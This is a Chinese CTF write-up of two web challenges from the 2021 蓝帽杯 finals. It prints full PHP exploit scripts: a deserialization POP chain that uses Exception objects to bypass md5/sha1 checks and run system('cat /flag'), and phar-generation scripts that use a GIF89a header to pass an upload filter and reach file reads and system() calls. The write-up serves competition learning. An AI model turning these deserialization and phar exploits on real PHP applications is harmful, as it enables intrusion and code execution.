2021蓝帽杯决赛web

2021蓝帽杯决赛web

杰克与肉丝

考察一个反序列化pop链构造和利用 Exception类 绕过md5 sha1

本质原理就是通过Exception的__toString返回值相同和构造errorcode不同来绕过

参考:https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/

Exp:

<?php
//highlight_file(__file__);


class Jack
{
    private $action;

    #设置不存在属性调用
    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    #调用不存在函数触发


}
class Titanic{
    public $people;
    public $ship;
}
class Rose{
    public $var1;
    public $var2;
    #尝试以调用函数的方式调用一个对象

    }


$cmd ='system("cat /flag");?>';
$ex1 = new Exception($cmd);$ex2 = new Exception($cmd,1);
$rose = new Rose();
$rose->var1 = $ex1;$rose->var2 = $ex2;

$love=new Love();
$jack=new Jack();
$ta=new Titanic();
$love->var=$rose;
$ta->ship=$love;
$ta->people=$jack;




echo urlencode(serialize($ta));


?>

然后使用生成的payload传入love参数即可获取flag

不一样的web

文件上传+phar伪协议+反序列化利用

文件上传限制很简单,加一个GIF89a头即可

在注释里给了两个类,看起来就是我们需要进行反序列化利用的类

image-20210604160428306

看起来需要去获取lib.php的内容,我们根据它所提供的源码去读lib.php:

生成phar脚本:

<?php
class Read{
    public $name;
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
        $func = $this->f;
        $func();
    }
}


$r=new Read;

$t=new Test(Array($r,'file_get'));


@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头
$o = $t;
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("hack.txt", "hack"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

echo base64_encode(file_get_contents("./phar.phar"));
?>

将生成的phar文件修改后缀名为gif,随后上传,

在check中使用phar://协议进行包含,获取lib.php源码

构造pop链:

<?php
error_reporting(0);
class Modifier{
        public $old_id;
        public $new_id;
        public $p_id;
        public function __construct(){
                $this->old_id = "1";
                $this->new_id = "0";
                $this->p_id = "1";
        }
        public function __get($value){
                $new_id = $value;
                $this->old_id = random_bytes(16);
                if($this->old_id===$this->new_id){
                        system($this->p_id);
                }
        }
}
class Read{
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Files{
        public $filename;
        public function __construct($filename){
                $this->filename = $this->FilesWaf($filename);
        }
        public function __wakeup(){
                $this->FilesWaf($this->filename);
        }
        public function __toString(){
                return $this->filename;
        }
        public function __destruct(){
                echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
                
        }
        public function FilesWaf($name){
                if(stristr($name, "/")!==False){
                        return "index.php";
                }
                return $name;
        }
}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
                $func = $this->f;
        $func();
    }
}
class User{
        public $name;
        public $profile;
        public function __construct($name){
                $this->name = $this->UserWaf($name);
                $this->profile = "I am admin.";
        }
        public function __wakeup(){
                $this->UserWaf($this->name);
        }
        public function __toString(){
                return $this->profile->name;
        }
        public function __destruct(){
                echo "Hello ".$this->UserWaf($this->name).".</br>";
                
        }
        public function UserWaf($name){
                if(strlen($name)>10){
                        return "admin";
                }
                if(!preg_match("/[a-f0-9]/iu",$name)){
                        return "admin";
                }
                return $name;
        }
}

$c = new Modifier();
$c->new_id = &$c->old_id;
$c->p_id = '';

$b = new User('admin');
$b->profile = $c;

$a = new User('admin');
$a->name = $b;


@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头
$o = $a;
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("hack.txt", "hack"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

echo base64_encode(file_get_contents("./phar.phar"));

和刚才一样利用

弹回shell

image-20210604145348731

打开后在根目录发现一个game可执行文件

拖进ida

Snipaste_2021-06-04_14-42-50

看起来需要切换到flag用户,密码也有

Snipaste_2021-06-04_14-42-42

最后在/home下发现flagSnipaste_2021-06-04_14-42-42

添加新评论

我们会加密处理您的邮箱保证您的隐私. 标有星号的为必填信息 *